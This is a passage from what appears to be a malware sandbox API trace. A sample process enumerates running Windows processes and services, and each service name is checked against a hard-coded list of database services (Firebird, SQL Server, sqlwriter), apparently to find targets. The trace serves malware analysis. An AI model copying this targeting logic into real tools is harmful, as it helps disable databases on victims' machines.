[0167.929] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0167.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0167.929] lstrlenW (lpString="ProfSvc") returned 7 [0167.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0167.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0167.930] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0167.930] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0167.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0167.930] lstrlenW (lpString="RpcEptMapper") returned 12 [0167.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0167.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0167.930] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0167.930] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0167.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0167.930] lstrlenW (lpString="RpcSs") returned 5 [0167.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0167.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0167.930] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0167.930] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0167.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0167.930] lstrlenW (lpString="SamSs") returned 5 [0167.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0167.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0167.930] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0167.930] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0167.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0167.930] lstrlenW (lpString="Schedule") returned 8 [0167.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0167.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0167.930] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0167.931] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0167.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0167.931] lstrlenW (lpString="SecurityHealthService") returned 21 [0167.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0167.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0167.931] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0167.931] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0167.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0167.931] lstrlenW (lpString="SENS") returned 4 [0167.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0167.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0167.931] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0167.931] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0167.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0167.931] lstrlenW (lpString="ShellHWDetection") returned 16 [0167.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0167.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0167.931] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0167.931] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0167.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0167.931] lstrlenW (lpString="Spooler") returned 7 [0167.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0167.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0167.931] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0167.931] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0167.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0167.931] lstrlenW (lpString="StateRepository") returned 15 [0167.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0167.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0167.932] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0167.932] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0167.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0167.932] lstrlenW (lpString="SysMain") returned 7 [0167.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0167.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0167.932] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0167.932] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0167.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0167.932] lstrlenW (lpString="SystemEventsBroker") returned 18 [0167.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0167.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0167.932] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0167.932] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0167.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0167.932] lstrlenW (lpString="Themes") returned 6 [0167.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0167.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0167.932] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0167.932] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0167.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0167.932] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0167.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0167.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0167.932] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0167.933] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0167.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45befd8 | out: hHeap=0x6a0000) returned 1 [0167.933] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x42c [0167.968] Process32FirstW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.970] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0167.971] lstrlenW (lpString="System") returned 6 [0167.971] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0167.971] lstrlenW (lpString="smss.exe") returned 8 [0167.971] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0167.972] lstrlenW (lpString="csrss.exe") returned 9 [0167.972] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0167.973] lstrlenW (lpString="wininit.exe") returned 11 [0167.973] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0167.974] lstrlenW (lpString="csrss.exe") returned 9 [0167.974] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0167.975] lstrlenW (lpString="winlogon.exe") returned 12 [0167.975] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0167.976] lstrlenW (lpString="services.exe") returned 12 [0167.976] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0167.977] lstrlenW (lpString="lsass.exe") returned 9 [0167.977] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0167.978] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0167.978] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0167.979] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0167.979] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.980] lstrlenW (lpString="svchost.exe") returned 11 [0167.980] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.981] lstrlenW (lpString="svchost.exe") returned 11 [0167.981] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0167.982] lstrlenW (lpString="dwm.exe") returned 7 [0167.982] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.982] lstrlenW (lpString="svchost.exe") returned 11 [0167.982] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.983] lstrlenW (lpString="svchost.exe") returned 11 [0167.983] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.984] lstrlenW (lpString="svchost.exe") returned 11 [0167.984] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.985] lstrlenW (lpString="svchost.exe") returned 11 [0167.985] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.986] lstrlenW (lpString="svchost.exe") returned 11 [0167.986] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.986] lstrlenW (lpString="svchost.exe") returned 11 [0167.986] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.987] lstrlenW (lpString="svchost.exe") returned 11 [0167.987] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.988] lstrlenW (lpString="svchost.exe") returned 11 [0167.988] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.990] lstrlenW (lpString="svchost.exe") returned 11 [0167.990] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.991] lstrlenW (lpString="svchost.exe") returned 11 [0167.991] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0167.992] lstrlenW (lpString="spoolsv.exe") returned 11 [0167.992] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.992] lstrlenW (lpString="svchost.exe") returned 11 [0167.993] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0167.993] lstrlenW (lpString="audiodg.exe") returned 11 [0167.993] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0167.994] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0167.994] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0167.995] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0167.995] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0167.996] lstrlenW (lpString="Memory Compression") returned 18 [0167.996] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0167.997] lstrlenW (lpString="sihost.exe") returned 10 [0167.997] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.998] lstrlenW (lpString="svchost.exe") returned 11 [0167.998] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0167.999] lstrlenW (lpString="msoia.exe") returned 9 [0167.999] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0168.000] lstrlenW (lpString="taskhostw.exe") returned 13 [0168.000] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0168.001] lstrlenW (lpString="explorer.exe") returned 12 [0168.001] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0168.001] lstrlenW (lpString="SearchUI.exe") returned 12 [0168.001] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0168.002] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0168.002] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0168.003] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0168.003] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0168.004] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0168.004] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0168.005] lstrlenW (lpString="hgaibc.exe") returned 10 [0168.005] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0168.006] lstrlenW (lpString="cmd.exe") returned 7 [0168.006] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0168.007] lstrlenW (lpString="conhost.exe") returned 11 [0168.007] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xed8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 1 [0168.008] lstrlenW (lpString="mode.com") returned 8 [0168.008] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xefc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="consent.exe")) returned 1 [0168.008] lstrlenW (lpString="consent.exe") returned 11 [0168.008] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xefc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="consent.exe")) returned 0 [0168.009] CloseHandle (hObject=0x42c) returned 1 [0168.009] Sleep (dwMilliseconds=0x1f4) [0169.267] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x458c358 [0169.268] EnumServicesStatusExW (in: hSCManager=0x458c358, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 0 [0169.268] GetLastError () returned 0xea [0169.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c30) returned 0x46a4f50 [0169.268] EnumServicesStatusExW (in: hSCManager=0x458c358, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x46a4f50, cbBufSize=0x1c30, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x46a4f50, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 1 [0169.269] CloseServiceHandle (hSCObject=0x458c358) returned 1 [0169.269] lstrlenW (lpString="Appinfo") returned 7 [0169.269] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0169.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0169.270] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0169.270] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0169.270] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0169.270] lstrlenW (lpString="AppXSvc") returned 7 [0169.270] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0169.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0169.270] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0169.270] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0169.270] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0169.270] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0169.270] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0169.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0169.270] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0169.270] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0169.270] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0169.270] lstrlenW (lpString="Audiosrv") returned 8 [0169.270] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0169.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0169.270] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0169.270] lstrcmpiW (lpString1="mssqlserver", 